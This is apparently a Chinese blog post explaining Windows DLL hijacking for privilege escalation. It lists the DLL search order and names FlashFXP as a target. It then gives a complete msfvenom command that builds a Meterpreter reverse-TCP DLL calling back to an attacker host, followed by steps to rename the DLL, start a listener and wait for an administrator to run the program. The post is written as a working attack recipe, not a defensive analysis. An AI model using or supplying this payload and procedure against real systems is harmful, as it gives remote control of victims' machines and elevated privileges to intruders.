WIN DLL劫持提权

WIN DLL劫持提权

原理:

Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、当前工作目录Current Working Directory,CWD

6、在PATH环境变量的目录(先系统后用户)

过程:

信息收集:

利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。

目标程序:

FlashFXP

利用

找到当前程序dll文件,利用msf生成相同文件名木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=4444 -f dll -o RAY.dll

然后修改文件名

msf设置监听

待管理员启动该程序,即可上线。


__EOF__

本文作者许公子Ray
本文链接https://www.cnblogs.com/rayob1/p/16096411.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   Ray言午  阅读(294)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示